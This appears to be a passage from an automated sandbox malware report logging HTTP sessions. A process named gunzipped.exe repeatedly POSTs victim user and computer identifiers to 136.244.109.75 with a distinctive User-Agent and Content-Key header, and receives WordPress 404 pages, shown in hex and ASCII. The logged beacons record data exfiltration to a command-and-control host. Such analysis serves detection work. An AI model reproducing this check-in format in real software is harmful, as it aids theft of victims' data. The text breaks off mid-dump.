                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:20.481553078 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:20.481570959 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:20.481589079 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:20.481622934 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:20.481642962 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:20.481662035 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:20.481678963 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:20.481697083 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:20.481714964 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          58192.168.2.549772136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:20.835118055 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:21.043060064 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:22.013158083 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:20 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:22.013219118 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:22.013257027 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:22.013293028 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:22.013334036 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:22.013370991 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:22.013408899 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:22.013452053 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:22.013490915 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:22.013531923 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          59192.168.2.549773136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:22.368817091 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:22.576855898 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:23.493002892 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:22 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 